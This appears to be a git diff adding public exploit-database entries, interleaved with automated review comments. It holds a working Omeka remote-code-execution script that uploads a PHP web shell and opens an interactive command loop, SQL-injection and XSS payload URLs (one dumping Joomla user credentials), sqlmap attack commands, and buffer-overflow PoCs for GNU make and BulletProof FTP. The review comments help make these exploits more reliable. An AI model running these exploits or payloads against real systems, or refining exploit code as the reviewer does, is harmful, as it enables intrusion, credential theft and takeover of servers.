?? () + + +Overflow code: +... +80548aa: 74 0c je 80548b8 +80548ac: 8d 74 26 00 lea 0x0(%esi,%eiz,1),%esi +80548b0: 89 c6 mov %eax,%esi +80548b2: 8b 00 mov (%eax),%eax +80548b4: 85 c0 test %eax,%eax +80548b6: 75 f8 jne 80548b0 +... + + +gdb-peda$ x/x $eax +0x807ff68: 0x00000000 + +peda vmmap +Start End Perm Name +0x08048000 0x0806f000 r-xp /root/Desktop/RESEARCH/make_BoF/make +0x0806f000 0x08070000 rw-p /root/Desktop/RESEARCH/make_BoF/make + +0x08070000 0x08092000 rw-p [heap] // heap overflow !! 
+ + + +******************************************************************************************* +******************************************************************************************* +64bits + + +Overflow Code : +40cc59: 74 10 je 40cc6b <__ctype_b_loc@plt+0xa52b> +40cc5b: 0f 1f 44 00 00 nop DWORD PTR [rax+rax*1+0x0] +40cc60: 48 89 c3 mov rbx,rax +40cc63: 48 8b 00 mov rax,QWORD PTR [rax] // heap overflow + + +Program received signal SIGSEGV, Segmentation fault. +[----------------------------------registers-----------------------------------] +RAX: 0xdeadbeefdeadbeef +RBX: 0xdeadbeefdeadbeef +RCX: 0x4242424242424242 ('BBBBBBBB') +RDX: 0x0 +RSI: 0x7fffffff97d0 ('A' ...) +RDI: 0x7fffffffa7e2 --> 0x732e656c69666500 ('') +RBP: 0x7fffffffb930 --> 0x1 +RSP: 0x7fffffff95f0 --> 0x0 +RIP: 0x40cc63 (mov rax,QWORD PTR [rax]) +R8 : 0x4242424242424242 ('BBBBBBBB') +R9 : 0x7ffff7972440 (mov dx,WORD PTR [rsi-0x2]) +R10: 0x4242424242424242 ('BBBBBBBB') +R11: 0x7ffff799f990 --> 0xfffd28d0fffd2708 +R12: 0x1 +R13: 0x0 +R14: 0x6397a0 --> 0x6f2e25 ('%.o') +R15: 0x0 +EFLAGS: 0x10282 (carry parity adjust zero SIGN trap INTERRUPT direction +overflow) +[-------------------------------------code-------------------------------------] +0x40cc59: je 0x40cc6b +0x40cc5b: nop DWORD PTR [rax+rax*1+0x0] +0x40cc60: mov rbx,rax +=> 0x40cc63: mov rax,QWORD PTR [rax] <----- Pointer dereferencing +0x40cc66: test rax,rax +0x40cc69: jne 0x40cc60 +0x40cc6b: cmp DWORD PTR [rbp-0x105c],0x1 +0x40cc72: lea rdi,[rbp-0x40] +[------------------------------------stack-------------------------------------] +0000| 0x7fffffff95f0 --> 0x0 +0008| 0x7fffffff95f8 --> 0x0 +0016| 0x7fffffff9600 --> 0x0 +0024| 0x7fffffff9608 --> 0x645e50 --> 0x646630 --> 0x64667b --> +0x5f7266006362696c ('libc') +0032| 0x7fffffff9610 --> 0xffffffdf +0040| 0x7fffffff9618 --> 0x645e58 --> 0x6462f0 --> 0x64a500 --> 0x64a541 +--> 0x5f726600656b616d ('make') +0048| 0x7fffffff9620 --> 0x7ffff7bd01f8 --> 0x645e50 --> 0x646630 --> +0x64667b 
--> 0x5f7266006362696c ('libc') +0056| 0x7fffffff9628 --> 0x0 +[------------------------------------------------------------------------------] +Legend: code, data, rodata, value +Stopped reason: SIGSEGV +0x000000000040cc63 in ?? () + + + +******************************************************************************************* +******************************************************************************************* +Proof of Concept - Source code +******************************************************************************************* +******************************************************************************************* +=cut + +#!/usr/bin/perl + +use 5.010; +use strict; +use warnings; +say "Please set ulimit value to 1000 before (ulimit -c 1000) "; +sleep 0.5; + + +my $buff = "A"x 4096 ; +my $addr = "\xef\xbe\xad\xde"; +my $make = "./make"; +my $gdb = "gdb --core core"; +my $PAYLOAD= (`perl -e 'print "$buff" . "$addr" '`); + +my $exec= qx($make $PAYLOAD); + +say " Reading Core file GDB "; +sleep 0.5; + +system ($gdb); diff --git a/platforms/multiple/webapps/34165.txt b/platforms/multiple/webapps/34165.txt new file mode 100755 index 000000000..a7d9d467b --- /dev/null +++ b/platforms/multiple/webapps/34165.txt 
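Review bot: The PoC script does not send the input the crash transcripts above were produced with: the gdb run uses `"A" x 4000 . "B"x96 . "\xef\xbe\xad\xde"x4`, while the script builds 4096 `A`s followed by a single `\xef\xbe\xad\xde`, so a reader cannot tell which layout actually reaches the `mov eax,DWORD PTR [eax]` dereference. The payload is also assembled by shelling out to a nested `perl -e` whose command string interpolates the raw 0xEF..0xDE bytes, and then handed to `qx($make $PAYLOAD)` where the shell re-parses it; `my $PAYLOAD = $buff . $addr;` followed by `system($make, $PAYLOAD);` delivers the same bytes without either round-trip. Two smaller points: Perl's `sleep` takes whole seconds, so `sleep 0.5` does not sleep at all, and `gdb --core core` should also be given the binary (`gdb ./make --core core`) so the backtrace resolves symbols. Finally, the transcripts show a read through an attacker-controlled pointer (eax/rax = 0xdeadbeef), which is what the output demonstrates; that the pointer was corrupted by a heap overflow is inferred from vmmap rather than shown, and the header should say so.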
@@ -0,0 +1,92 @@ +# Exploit Title: Stored XSS vulnerability in Zenoss core open source +monitoring system +# Date: 12/05/2014 + +# Exploit author: Dolev Farhi dolev(at)openflare.org + +# Vendor homepage: http://zenoss.com + +# Software Link: http://www.zenoss.com + +# Version: Core 4.2.5-2108 64bit + +# Tested on: Kali Linux + +# Vendor alerted: 12/05/2014 + + # CVE-2014-3738 + + + +Software details: + +================== + +Zenoss (Zenoss Core) is a free and open-source application, server, and +network management platform based on the Zope application server. + +Released under the GNU General Public License (GPL) version 2, Zenoss +Core provides a web interface that + +allows system administrators to monitor availability, +inventory/configuration, performance, and events. + + + +Vulnerability details: Stored XSS Vulnerability + +======================== + +A persistent XSS vulnerability was found in Zenoss core, by creating a +malicious host with the Title any user +browsing + +to the relevant manufacturers page will get a client-side script +executed immediately. + + + + + +Proof of Concept: + + 1. Create a device with with the Title + + + + + 2. Navigate to the Infrastructure -> Manufacturers +page. + + + + 3. pick the name of the manufacturer of the device, e.g. +Intel + + + + 4. select the type of the hardware the device is +assigned to, e.g. GenuineIntel_ Intel(R) Core(TM) i7-2640M CPU _ 2.80GHz + + + + 5. the XSS Executes. + + + + + + + + + + GenuineIntel_ Intel(R) Core(TM) +i7-2640M CPU _ 2.80GHz + + + + + + + diff --git a/platforms/php/remote/34160.txt b/platforms/php/remote/34160.txt new file mode 100755 index 000000000..49ce22bf2 --- /dev/null +++ b/platforms/php/remote/34160.txt 
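Review bot: The proof of concept is not reproducible as it appears here: step 1 reads `Create a device with with the Title` with no title value, and the closing example shows only the manufacturer string, so the script payload is missing — if the original file carried a raw `<script>` tag it has been lost in this listing, and the advisory should carry the payload as escaped text (e.g. `&lt;script&gt;alert(document.cookie)&lt;/script&gt;`) or inside a code block so it survives rendering. The precondition is also unstated: adding a device presumably requires an authenticated Zenoss account with device-management rights, so this is a stored XSS by a lower-privileged or compromised user against administrators browsing Infrastructure -> Manufacturers, and a header line such as `# Requires: authenticated user able to add devices` would make that clear. The duplicated `with with` in step 1 is a typo.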
@@ -0,0 +1,293 @@ +#!/usr/bin/env python +# +# +# Omeka 2.2.1 Remote Code Execution Exploit +# +# +# Vendor: Omeka Team (CHNM GMU) +# Product web page: http://www.omeka.org +# Affected version: 2.2.1 and 2.2 +# +# Summary: Omeka is a free, flexible, and open source web-publishing +# platform for the display of library, museum, archives, and scholarly +# collections and exhibitions. Its 'five-minute setup' makes launching +# an online exhibition as easy as launching a blog. +# +# Desc: Omeka suffers from an authenticated arbitrary PHP code execution. +# The vulnerability is caused due to the improper verification of +# uploaded files in '/admin/items/add' script thru the 'file[0]' POST +# parameter. This can be exploited to execute arbitrary PHP code by +# uploading a malicious PHP script file that will be stored in +# '/files/original' directory after successfully disabling the file +# validation option (or adding something like 'application/x-php' into the +# allowed MIME types list) and bypassing the rewrite rule in the '.htaccess' +# file with '.php5' extension. 
+# +# .htaccess fix by vendor: +# ------------------------------------------------------- +# Line 29: -RewriteRule !\.php$ - [C] +# Line 29: +RewriteRule !\.(php[0-9]?|phtml|phps)$ - [C] +# ------------------------------------------------------- +# +# - Role permission for disabling validation and uploading files: Super +# - Role permission for uploading files: Super, Admin +# +# Ref: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5193.php +# +# Tested on: Kali Linux 3.7-trunk-686-pae +# Apache/2.2.22 (Debian) +# PHP 5.4.4-13(apache2handler) +# MySQL 5.5.28 +# +# +# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic +# +# Zero Science Lab - http://www.zeroscience.mk +# Macedonian Information Security Research And Development Laboratory +# +# +# Advisory ID: ZSL-2014-5194 +# Advisory URL: http://zeroscience.mk/en/vulnerabilities/ZSL-2014-5194.php +# +# +# 16.07.2014 +# +# + +version = '2.0.0.251' + +import itertools, mimetools, mimetypes +import cookielib, urllib, urllib2, sys +import logging, os, time, datetime, re + +from colorama import Fore, Back, Style, init +from cStringIO import StringIO +from urllib2 import URLError + +init() + +if os.name == 'posix': os.system('clear') +if os.name == 'nt': os.system('cls') +piton = os.path.basename(sys.argv[0]) + +def bannerche(): + print ''' + @---------------------------------------------------------------@ + | | + | Omeka 2.2.1 Remote Code Execution Exploit | + | | + | | + | ID: ZSL-2014-5194 | + | | + | Copyleft (c) 2014, Zero Science Lab | + | | + @---------------------------------------------------------------@ + ''' + if len(sys.argv) < 3: + print '\n\x20\x20[*] '+Fore.YELLOW+'Usage: '+Fore.RESET+piton+' \n' + print '\x20\x20[*] '+Fore.CYAN+'Example: '+Fore.RESET+piton+' zeroscience.mk omeka\n' + sys.exit() + +bannerche() + +print '\n\x20\x20[*] Initialising exploit '+'.'*34+Fore.GREEN+'[OK]'+Fore.RESET + +host = sys.argv[1] +path = sys.argv[2] + +cj = cookielib.CookieJar() +opener = 
urllib2.build_opener(urllib2.HTTPCookieProcessor(cj)) + +try: + opener.open('http://'+host+'/'+path+'/admin/users/login') +except urllib2.HTTPError, errorzio: + if errorzio.code == 404: + print '\x20\x20[*] Checking path '+'.'*41+Fore.RED+'[ER]'+Fore.RESET + print '\x20\x20[*] '+Fore.YELLOW+'Check your path entry.'+Fore.RESET + print + sys.exit() +except URLError, errorziocvaj: + if errorziocvaj.reason: + print '\x20\x20[*] Checking host '+'.'*41+Fore.RED+'[ER]'+Fore.RESET + print '\x20\x20[*] '+Fore.YELLOW+'Check your hostname entry.'+Fore.RESET + print + sys.exit() + +print '\x20\x20[*] Checking host and path '+'.'*32+Fore.GREEN+'[OK]'+Fore.RESET +print '\x20\x20[*] Login please.' + +username = raw_input('\x20\x20[*] Enter username: ') +password = raw_input('\x20\x20[*] Enter password: ') + +login_data = urllib.urlencode({ + 'username' : username, + 'password' : password, + 'remember' : '0', + 'submit' : 'Log In' + }) + +login = opener.open('http://'+host+'/'+path+'/admin/users/login', login_data) +auth = login.read() +for session in cj: + sessid = session.name + +print '\x20\x20[*] Mapping session ID '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET +ses_chk = re.search(r'%s=\w+' % sessid , str(cj)) +cookie = ses_chk.group(0) +print '\x20\x20[*] Cookie: '+Fore.YELLOW+cookie+Fore.RESET + +if re.search(r'Login information incorrect. 
Please try again.', auth): + print '\x20\x20[*] Faulty credentials given '+'.'*30+Fore.RED+'[ER]'+Fore.RESET + print + sys.exit() +else: + print '\x20\x20[*] Authenticated '+'.'*41+Fore.GREEN+'[OK]'+Fore.RESET + +disable_file_validation = urllib.urlencode({ + 'disable_default_file_validation' : '1', + 'submit' : 'Save+Changes' + }) + +opener.open('http://'+host+'/'+path+'/admin/settings/edit-security', disable_file_validation) +print '\x20\x20[*] Disabling file validation '+'.'*29+Fore.GREEN+'[OK]'+Fore.RESET + +class MultiPartForm(object): + + def __init__(self): + self.form_fields = [] + self.files = [] + self.boundary = mimetools.choose_boundary() + return + + def get_content_type(self): + return 'multipart/form-data; boundary=%s' % self.boundary + + def add_field(self, name, value): + self.form_fields.append((name, value)) + return + + def add_file(self, fieldname, filename, fileHandle, mimetype=None): + body = fileHandle.read() + if mimetype is None: + mimetype = mimetypes.guess_type(filename)[0] or 'application/octet-stream' + self.files.append((fieldname, filename, mimetype, body)) + return + + def __str__(self): + + parts = [] + part_boundary = '--' + self.boundary + + parts.extend( + [ part_boundary, + 'Content-Disposition: form-data; name="%s"' % name, + '', + value, + ] + for name, value in self.form_fields + ) + + parts.extend( + [ part_boundary, + 'Content-Disposition: file; name="%s"; filename="%s"' % \ + (field_name, filename), + 'Content-Type: %s' % content_type, + '', + body, + ] + for field_name, filename, content_type, body in self.files + ) + + flattened = list(itertools.chain(*parts)) + flattened.append('--' + self.boundary + '--') + flattened.append('') + return '\r\n'.join(flattened) + +if __name__ == '__main__': + + form = MultiPartForm() + form.add_field('public', '1') + form.add_field('submit', 'Add Item') + + form.add_file('file[0]', 'thricerbd.php5', + fileHandle=StringIO('\"; passthru($_GET[\'cmd\']); echo \"\"; ?>')) + + request = 
urllib2.Request('http://'+host+'/'+path+'/admin/items/add') + request.add_header('User-agent', 'joxypoxy 2.0') + body = str(form) + request.add_header('Content-type', form.get_content_type()) + request.add_header('Cookie', cookie) + request.add_header('Content-length', len(body)) + request.add_data(body) + request.get_data() + print '\x20\x20[*] Sending payload '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET + checkitemid = urllib2.urlopen(request).read() + itemid = re.search('The item #(\d+)', checkitemid).group(1) + print '\x20\x20[*] Getting item ID '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET + print '\x20\x20[*] Item ID: '+Fore.YELLOW+itemid+Fore.RESET + + +checkfileid = opener.open('http://'+host+'/'+path+'/admin/items/show/'+itemid) +fileid = re.search('/admin/files/show/(\d+)', checkfileid.read()).group(1) +print '\x20\x20[*] Getting file ID '+'.'*39+Fore.GREEN+'[OK]'+Fore.RESET +print '\x20\x20[*] File ID: '+Fore.YELLOW+fileid+Fore.RESET + +print '\x20\x20[*] Getting file name '+'.'*37+Fore.GREEN+'[OK]'+Fore.RESET +checkhash = opener.open('http://'+host+'/'+path+'/admin/files/show/'+fileid) +hashfile = re.search('/files/original/(.+?).php5', checkhash.read()).group(1) +print '\x20\x20[*] File name: '+Fore.YELLOW+hashfile+'.php5'+Fore.RESET + +print '\x20\x20[*] Starting logging service '+'.'*30+Fore.GREEN+'[OK]'+Fore.RESET +print '\x20\x20[*] Spawning shell '+'.'*40+Fore.GREEN+'[OK]'+Fore.RESET +time.sleep(1) + +furl = '/files/original/'+hashfile+'.php5' + +print +today = datetime.date.today() +fname = 'omeka-'+today.strftime('%d-%b-%Y')+time.strftime('_%H%M%S')+'.log' +logging.basicConfig(filename=fname,level=logging.DEBUG) + +logging.info(' '+'+'*75) +logging.info(' +') +logging.info(' + Log started: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S')) +logging.info(' + Title: Omeka 2.2.1 Remote Code Execution Exploit') +logging.info(' + Python program executed: '+sys.argv[0]) +logging.info(' + Version: '+version) +logging.info(' + Full query: 
\''+piton+'\x20'+host+'\x20'+path+'\'') +logging.info(' + Username input: '+username) +logging.info(' + Password input: '+password) +logging.info(' + Vector: '+'http://'+host+'/'+path+furl) +logging.info(' +') +logging.info(' + Advisory ID: ZSL-2014-5194') +logging.info(' + Zero Science Lab - http://www.zeroscience.mk') +logging.info(' +') +logging.info(' '+'+'*75+'\n') + +print Style.DIM+Fore.CYAN+'\x20\x20[*] Press [ ENTER ] to INSERT COIN!\n'+Style.RESET_ALL+Fore.RESET +raw_input() +while True: + try: + cmd = raw_input(Fore.RED+'shell@'+host+':~# '+Fore.RESET) + execute = opener.open('http://'+host+'/'+path+furl+'?cmd='+urllib.quote(cmd)) + reverse = execute.read() + pattern = re.compile(r'
(.*?)
',re.S|re.M) + + print Style.BRIGHT+Fore.CYAN + cmdout = pattern.match(reverse) + print cmdout.groups()[0].strip() + print Style.RESET_ALL+Fore.RESET + + if cmd.strip() == 'exit': + break + + logging.info('Command executed: '+cmd+'\n\nOutput: \n'+'='*8+'\n\n'+cmdout.groups()[0].strip()+'\n\n'+'-'*60+'\n') + except Exception: + break + +logging.warning('\n\nLog ended: '+today.strftime('%A, %d-%b-%Y')+time.strftime(', %H:%M:%S')+'\n\nEND OF LOG') +print '\x20\x20[*] Carpe commentarius '+'.'*36+Fore.GREEN+'[OK]'+Fore.RESET +print '\x20\x20[*] Log file: '+Fore.YELLOW+fname+Fore.RESET +print + +sys.exit() diff --git a/platforms/php/webapps/34157.txt b/platforms/php/webapps/34157.txt new file mode 100755 index 000000000..98081a008 --- /dev/null +++ b/platforms/php/webapps/34157.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/40941/info + +Firebook is prone to multiple cross-site scripting vulnerabilities and directory-traversal vulnerabilities because it fails to sufficiently sanitize user-supplied input. + +Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, and to view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials and other harvested information may aid in launching further attacks. + +http://www.example.com/path_to_firebook_admin/?URLproxy=%3Cscript%3Ealert(document.cookie)%3C/script%3E +http://www.example.com/guestbook/index.html?answer=%3Cscript%3Ealert(document.cookie)%3C/script%3E +http://www.example.com/guestbook/index.html?answer=guestbook/guest/file.html;page=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E +http://www.example.com/path_to_firebook_admin/?param=1;show=../.htaccess; +http://www.example.com/guestbook/index.html?answer=guestbook/guest/%2E%2E/index.html 
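Review bot: The log file written near the end of the hunk records the operator's credentials in clear text — `logging.info(' + Password input: '+password)` together with the username line before it — so the `omeka-<date>.log` left in the working directory holds a reusable login for the target; drop that line or redact it, e.g. `logging.info(' + Password input: ' + '*' * len(password))`. Separately, every `re.search(...).group(1)` (session id, item id, file id, file name) dereferences the match unconditionally, so an unexpected page aborts with an uninformative AttributeError; bind the match first, `m = re.search(r'The item #(\d+)', checkitemid)` / `if m is None: sys.exit('[*] Could not find item ID')`, and do the same for the other three. The `except Exception: break` in the command loop hides the same class of failure silently; call `logging.exception('request failed')` before breaking so the log explains why the session ended. Also `sessid` is only assigned inside `for session in cj:`, so an empty cookie jar leaves it undefined at the `re.search(r'%s=\w+' % sessid, str(cj))` line.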
diff --git a/platforms/php/webapps/34159.txt b/platforms/php/webapps/34159.txt new file mode 100755 index 000000000..043c21296 --- /dev/null +++ b/platforms/php/webapps/34159.txt @@ -0,0 +1,10 @@ +source: http://www.securityfocus.com/bid/40964/info + +The Gallery XML Joomla! component is prone to an SQL-injection vulnerability and a local file-include vulnerability because it fails to sufficiently sanitize user-supplied data. + +An attacker can exploit these vulnerabilities to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database; by using directory-traversal strings to execute local script code in the context of the application, the attacker may be able to obtain sensitive information that may aid in further attacks. + + +http://www.example.com/index.php?option=com_galleryxml&controller=[LFI]&task=catpics&gcatid=1 +http://www.example.com/index.php?option=com_galleryxml&controller=galpic&task=catpics&gcatid=-1 union select 1,2,3,4,5,6,concat(username,char(32),password),8,9,10,11,12 from jos_users -- ' + diff --git a/platforms/php/webapps/34161.txt b/platforms/php/webapps/34161.txt new file mode 100755 index 000000000..7b5df8e58 --- /dev/null +++ b/platforms/php/webapps/34161.txt 
@@ -0,0 +1,98 @@ +?Wordpress Video Gallery + +###################### +# Exploit Title : Wordpress Video Gallery 2.5 SQL Injection and XSS Vulnerabilities + +# Exploit Author : Claudio Viviani + +# Vendor Homepage : http://www.apptha.com/category/extension/Wordpress/Video-Gallery + +# Software Link : http://downloads.wordpress.org/plugin/contus-video-gallery.2.5.zip ( Fixed :\ ) + +# Dork Google: inurl:/contus-video-gallery/hdflvplayer/hdplayer.swf + (Click on "Repeat the search with the omitted results included") + +# Date : 2014-07-15 + +# Tested on : Windows 7 / Mozilla Firefox + Windows 7 / sqlmap (0.8-1) + Linux / Mozilla Firefox + Linux / sqlmap 1.0-dev-5b2ded0 + +###################### + +# Vulnerability Disclosure Timeline: + +2014-07-15: Discovered vulnerability +2014-07-16: Vendor Notification (Support e-mail address) +2014-07-17: Vendor Response/Feedback +2014-07-23: Vendor Fix/Patch (same version number 2.5) +2014-07-24: Public Disclosure + +# Description + +Wordpress Video Gallery 2.5 suffers from SQL injection and Cross Site Script vulnerabilities + + +###################### + +# PoC + +# Vulnerablity n°1: + +# SQL Injection 1 (Authentication NOT Required): + +1) Open the browser and connect to url http://VICTIM/wp-content/plugins/contus-video-gallery/myextractXML.php + +2) Copy a video_id number (ex. video_id="1") + +3) sqlmap -u "http://VICTIM/wp-admin/admin-ajax.php?action=myextractXML&vid=1" -p vid + + +[21:02:40] [INFO] GET parameter 'vid' is 'AND boolean-based blind - WHERE or HAVING clause' injectable +... +... +... 
+[21:03:34] [INFO] GET parameter 'vid' is 'MySQL > 5.0.11 AND time-based blind' injectable + + +# SQL Injection 2 (Authentication Required): + +sqlmap --cookie="INSER_WORDPRESS_COOKIE_HERE" -u "http://VICTIM/wp-admin/admin.php?page=newplaylist&playlistId=1" -p playlistId + +sqlmap --cookie="INSER_WORDPRESS_COOKIE_HERE" -u "http://VICTIM/wp-admin/admin.php?page=newvideo&videoId=1" -p videoId + +###################### + +# Vulnerablity n°2: + +# XSS Reflected Authenticated (/videoads/videoads.php, /video/video.php, /playlist/playlist.php ) + +# PoC: + +POST +Host=VICTIM +User-Agent=Mozilla/5.0 (Windows NT 6.1; WOW64; rv:30.0) Gecko/20100101 Firefox/30.0 +Accept=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language=it-IT,it;q=0.8,en-US;q=0.5,en;q=0.3 +Accept-Encoding=gzip, deflate +Referer=http://VICTIM/wp-admin/admin.php?page=videoads +Cookie=wordpress_b43b255bc018ee66673cd91980a723bf=usertest%7C1405626269%7Ce1559aa048ec23f2ddbb5a40290a3d2e; wp-settings-1=advImgDetails%3Dshow%26libraryContent%3Dupload%26wpfb_adv_uploader%3D1%26editor%3Dtinymce%26uploader%3D1; wp-settings-time-1=1405118515; bLicense54=true; __utma=86855576.2039073811.1404413871.1404413871.1404416567.2; __utmz=86855576.1404413871.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_fid=6EEA54B2DFA4150F-06C135149F70F3D9; wp-settings-time-2=1405287261; wp-settings-2=mfold%3Do%26libraryContent%3Dupload; cms-panel-collapsed-cms-content-tools-CMSPagesController=true; cms-panel-collapsed-cms-menu=false; cms-panel-collapsed-cms-content-tools-AssetAdmin=true; cms-panel-collapsed-cms-content-tools-CMSMain=false; redux_current_tab=0; wordpress_test_cookie=WP+Cookie+check; wordpress_logged_in_b43b255bc018ee66673cd91980a723bf=usertest%7C1405626269%7Cd8c8ffae7aa7720d4fb3cb56537b1ea7 +Connection=keep-alive +Content-Type=application/x-www-form-urlencoded +Content-Length=110 +POSTDATA=videoadssearchQuery=&page=videoads&videoadsearchbtn=Search+Video+Ads + + +##################### + 
+Discovered By : Claudio Viviani + http://www.homelab.it + info@homelab.it + homelabit@protonmail.ch + + https://www.facebook.com/homelabit + https://twitter.com/homelabit + https://plus.google.com/+HomelabIt1/ + +##################### \ No newline at end of file diff --git a/platforms/windows/dos/34151.txt b/platforms/windows/dos/34151.txt new file mode 100755 index 000000000..854dc0654 --- /dev/null +++ b/platforms/windows/dos/34151.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/40885/info + +Adobe SVG Viewer is prone to a remote code-execution vulnerability. + +Attackers can exploit this issue to execute arbitrary code in the context of the application. Failed attacks may cause a denial-of-service condition. + +Adobe SVG Viewer 3.03 is vulnerable; other versions may also be affected. + +http://www.exploit-db.com/sploits/34151.rar \ No newline at end of file diff --git a/platforms/windows/dos/34158.txt b/platforms/windows/dos/34158.txt new file mode 100755 index 000000000..45422d2e2 --- /dev/null +++ b/platforms/windows/dos/34158.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/40945/info + +Chrome Engine 4 is prone to a denial-of-service vulnerability. + +An attacker can exploit this issue to crash the affected server, resulting in denial-of-service conditions. + +Chrome Engine version 4 is vulnerable; other versions may also be affected. + +http://www.exploit-db.com/sploits/34158.zip \ No newline at end of file diff --git a/platforms/windows/dos/34162.py b/platforms/windows/dos/34162.py new file mode 100755 index 000000000..559f86531 --- /dev/null +++ b/platforms/windows/dos/34162.py 
@@ -0,0 +1,55 @@
+#-----------------------------------------------------------------------------#
+# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) #
+# Date: Jul 24 2014 #
+# Exploit Author: Gabor Seljan #
+# Software Link: http://www.bpftp.com/ #
+# Version: 2010.75.0.76 #
+# Tested on: Windows XP SP3 #
+# CVE: CVE-2014-2973 #
+#-----------------------------------------------------------------------------#
+
+'''
+(a00.9e4): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=41414141 ebx=41414141 ecx=007ef590 edx=00000000 esi=017a4f6a edi=017a516a
+eip=005c005b esp=0012f594 ebp=0012f610 iopl=0 nv up ei pl zr na pe nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
+*** ERROR: Symbol file could not be found. Defaulted to export symbols for bpftpclient.exe -
+bpftpclient+0x1c005b:
+005c005b f6431c10 test byte ptr [ebx+1Ch],10h ds:0023:4141415d=??
+0:000> !exchain
+0012f59c: bpftpclient+1c044e (005c044e)
+0012f5a8: bpftpclient+1c046b (005c046b)
+0012f618: 43434343
+Invalid exception stack at 42424242
+0:000> g
+(a00.9e4): Access violation - code c0000005 (first chance)
+First chance exceptions are reported before any exception handling.
+This exception may be expected and handled.
+eax=00000000 ebx=00000000 ecx=43434343 edx=7c9032bc esi=00000000 edi=00000000
+eip=43434343 esp=0012f1c4 ebp=0012f1e4 iopl=0 nv up ei pl zr na pe nc
+cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
+43434343 ?? ???
+'''
+
+#!/usr/bin/python
+
+junk1 = b'\x41' * 89
+nSEH = b'\x42' * 4
+SEH = b'\x43' * 4
+junk2 = b'\x44' * 1000
+
+sploit = junk1 + nSEH + SEH + junk2
+
+try:
+ print('[+] Creating exploit file...')
+ f = open('sploit.txt', 'wb')
+ f.write(sploit)
+ f.close()
+ print('[+] Exploit file created successfully!')
+except:
+ print('[!] 
Error while creating exploit file!')
+
+print('[+] Use the following as Server Name/IP with any user\'s credentials!')
+print(sploit.decode())
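Review bot: The bare `except:` around the file write at the end of the hunk swallows every exception, including KeyboardInterrupt and SystemExit, and discards the reason the write failed, so a permissions or disk error is reported only as a generic message. The handle from `f = open('sploit.txt', 'wb')` is also never closed if `f.write` raises, because the `f.close()` is inside the guarded block rather than a `finally` or context manager. Rewrite the block with `with` and a narrow handler that prints the error, as below. Unrelated but worth a fix: the `#!/usr/bin/python` line after the docstring is inert (only line 1 is honoured as a shebang) and should be moved to the top or dropped.
```python
# … unchanged: header, crash dump docstring and payload construction …
try:
    print('[+] Creating exploit file...')
    with open('sploit.txt', 'wb') as f:
        f.write(sploit)
    print('[+] Exploit file created successfully!')
except OSError as exc:
    print('[!] Error while creating exploit file: %s' % exc)
```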